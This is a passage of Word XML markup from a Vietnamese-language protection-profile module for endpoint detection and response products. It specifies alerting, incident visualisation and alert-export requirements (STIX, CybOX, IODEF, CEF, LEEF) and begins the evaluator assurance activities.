        <w:t xml:space="preserve">, TOE dự kiến phải dựa vào một số chức năng </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> được thực hiện bởi toàn bộ ứng dụng và được đánh giá dựa trên </w:t>
      </w:r>
      <w:r w:rsidR="008950B5" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hồ sơ bảo vệ</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> cơ sở. Các SFRs được liệt kê trong phần này được định nghĩa trong PP cơ sở và có liên quan đến hoạt động an toàn của EDR. Phần này mô tả bất kỳ sửa đổi nào mà Đánh giá viên phải thực hiện đối với SFR của PP cơ sở để đáp ứng các chức năng cần thiết của EDR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1079BF4C" w14:textId="6CDFF0B0" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Hinhve"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>9.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:r w:rsidR="00E51F39" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Sửa đổi </w:t>
      </w:r>
      <w:r w:rsidR="00E51F39" w:rsidRPr="00204C5F">
        <w:t>SFRs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AC8853" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Hinhve"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>PP-Module không sửa đổi bất kỳ SFRs nào được xác định bởi PP áp dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF69717" w14:textId="3846961C" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Hinhve"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">9.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">Yêu cầu chức năng </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:t>an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> TOE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410F3D60" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Hinhve"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Phần sau đây mô tả SFRs phải đáp ứng được bởi bất kỳ TOE nào tuyên bố phù hợp với PP-Module này. Các SFR phải được yêu cầu bất kể cấu hình PP nào được sử dụng để xác định TOE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B2548F" w14:textId="762F89E6" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">9.3.1 FAU: </w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kiểm toán</w:t>
      </w:r>
      <w:r w:rsidR="003A2B0C" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> an toàn </w:t>
      </w:r>
      <w:r w:rsidR="003A2B0C" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(FAU)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5462ACC4" w14:textId="2CDAB1AC" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc502096848"/>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>9.</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">.1.1 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>FAU_ALT_EXT.1 C</w:t>
      </w:r>
      <w:r w:rsidR="003A2B0C" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ác c</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>ảnh báo máy chủ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688ACB98" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FAU_ALT_EXT.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB17D35" w14:textId="297326B9" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">EDR </w:t>
      </w:r>
      <w:r w:rsidR="004D2172" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>phải</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> cảnh báo người dùng được ủy quyền trên hệ thống quản trị trong trường hợp ghi nhận bất kỳ hoạt động nào sau đây:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471D1ED0" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>a. Thay đổi trạng thái đăng ký máy chủ trung gian;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4333F31F" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>b. Phát hiện hoạt động có khả năng trái phép trên các điểm cuối đã đăng ký.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B02B2C5" w14:textId="234F1901" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lưu ý áp dụng</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Mục đích của yêu cầu này là xác định khả năng cảnh báo nhóm quản trị tối thiểu mà EDR phải có khả năng hiển thị cho người dùng được ủy quyền. Ví dụ về việc phát hiện hoạt động có khả năng trái phép trên các điểm cuối đã đăng ký bao gồm; hoạt động bất thường, leo thang đặc quyền và </w:t>
      </w:r>
      <w:r w:rsidR="004D2172" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dịch chuyển thành phần</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7191067B" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FAU_ALT_EXT.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B2917F" w14:textId="031F53C2" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">EDR sẽ cung cấp một </w:t>
      </w:r>
      <w:r w:rsidR="004D2172" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thông tin</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> trực quan về các cảnh báo được phát hiện về các sự cố có khả năng trái phép và sẽ bao gồm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548495DE" w14:textId="0C5BF537" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">a. Mức độ nghiêm trọng của sự cố ban đầu và </w:t>
      </w:r>
      <w:r w:rsidR="003A2B0C" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="003A2B0C" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lựa chọn</w:t>
      </w:r>
      <w:r w:rsidR="003A2B0C" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="002D622B">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>đánh giá, phân loại, điểm số, xếp hạng</w:t>
      </w:r>
      <w:r w:rsidR="003A2B0C" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D765297" w14:textId="4B596655" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">b. </w:t>
      </w:r>
      <w:r w:rsidR="004769FD" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Trình tự thời gian </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>của sự cố.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4B6F1B" w14:textId="0865A049" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lưu ý áp dụng:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mục đích của yêu cầu này là chỉ rõ tập hợp tối thiểu các sự cố được trực quan hóa mà EDR phải có khả năng thể hiện cho người dùng được cấp quyền. Trực quan hóa được định nghĩa rộng rãi là việc hiển thị dữ liệu sự cố cho người dùng được cấp quyền trên giao diện quản trị. Hình ảnh trực quan không bắt buộc phải</w:t>
      </w:r>
      <w:r w:rsidR="003A2B0C" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> có khả năng</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> tương tác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF22936" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FAU_ALT_EXT.1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2423E49F" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>EDR sẽ cung cấp khả năng xuất dữ liệu cho các cảnh báo được chọn với định dạng dựa trên tiêu chuẩn được chỉ định là được lựa chọn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10065FBD" w14:textId="7F8DAFAB" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="003A2B0C" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Biểu diễn thông tin về mối đe dọa có cấu trúc</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Structured Threat Information eXpression (STIX),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F937D12" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>- Biểu thức điện tử quan sát trên không gian mạng - Cyber Observable eXpression (CybOX),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38320A35" w14:textId="28D358B9" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">- Định dạng mô tả </w:t>
      </w:r>
      <w:r w:rsidR="003A2B0C" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">trao đổi </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">đối tượng </w:t>
      </w:r>
      <w:r w:rsidR="003A2B0C" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">sự cố </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>- Incident Object Description Exchange Format (IODEF),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BE77F4" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>- Định dạng sự kiện chung - Common Event Format (CEF),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100CD0A4" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>- Định dạng mở rộng nhật ký sự kiện - Log Event Extended Format (LEEF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56ACE6F0" w14:textId="2431D0C7" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lưu ý áp dụng:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mục đích của yêu cầu này là chỉ định lựa chọn các định dạng dựa trên tiêu chuẩn mà EDR phải cung cấp để xuất các cảnh báo đã chọn, ít nhất một định dạng phải được chọn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42246A57" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hoạt động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8455"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="23E8DD5B" w14:textId="77777777" w:rsidTr="00C42841">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1638" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A106DB1" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Hoạt động</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8535" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="334CC9DC" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Hoạt động đảm bảo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="7852FB4C" w14:textId="77777777" w:rsidTr="00C42841">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1638" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3780BD22" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>TSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8535" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60E4895B" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Đánh giá viên phải kiểm tra TSS để đảm bảo rằng TSS mô tả cách các cảnh báo về những thay đổi trạng thái đăng ký máy chủ trung gian và các hoạt động có khả năng trái phép trên các điểm cuối đã đăng ký được phát hiện và hiển thị. Đánh giá viên phải kiểm tra TSS để đảm bảo TSS chứa danh sách các loại hoạt động trái phép được EDR phân loại hoặc dán nhãn khi bị phát hiện.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A765741" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Đánh giá viên phải kiểm tra TSS để xác định TSS mô tả cách hiển thị trực quan hóa cảnh báo và nội dung nào được sử dụng.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68FE215E" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:spacing w:val="-4"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
